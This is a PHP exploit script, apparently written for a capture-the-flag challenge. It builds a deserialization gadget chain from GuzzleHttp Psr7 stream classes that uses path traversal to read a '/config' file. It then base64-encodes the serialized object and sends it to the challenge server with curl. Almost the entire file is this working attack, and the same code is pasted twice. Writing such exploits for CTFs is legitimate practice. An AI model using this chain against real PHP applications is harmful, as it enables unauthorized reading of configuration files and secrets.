xl00t/exploit.php

## exploit.php
<?php
namespace GuzzleHttp\Psr7;
include_once "vendor/autoload.php";

$fnstream = new FnStream([]);
$noseekstream = new NoSeekStream($fnstream);
$noseekstream->custom_method = ['allow_attribute', 'register', 'register', 'getContents'];
$stream = new Stream(fopen("test.php","r"), ["metadata" => $noseekstream, "size"=>[['_fn_getContents'],['_fn_getContents', '/../../../../config'], ['display_content', true], []]]);

$payload = base64_encode(serialize($stream));
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://unserialkiller2.chall.malicecyber.com/?data=$payload");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
curl_close($ch);
echo $output;
	<?php
	namespace GuzzleHttp\Psr7;
	include_once "vendor/autoload.php";

	$fnstream = new FnStream([]);
	$noseekstream = new NoSeekStream($fnstream);
	$noseekstream->custom_method = ['allow_attribute', 'register', 'register', 'getContents'];
	$stream = new Stream(fopen("test.php","r"), ["metadata" => $noseekstream, "size"=>[['_fn_getContents'],['_fn_getContents', '/../../../../config'], ['display_content', true], []]]);

	$payload = base64_encode(serialize($stream));
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, "http://unserialkiller2.chall.malicecyber.com/?data=$payload");
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	$output = curl_exec($ch);
	curl_close($ch);
	echo $output;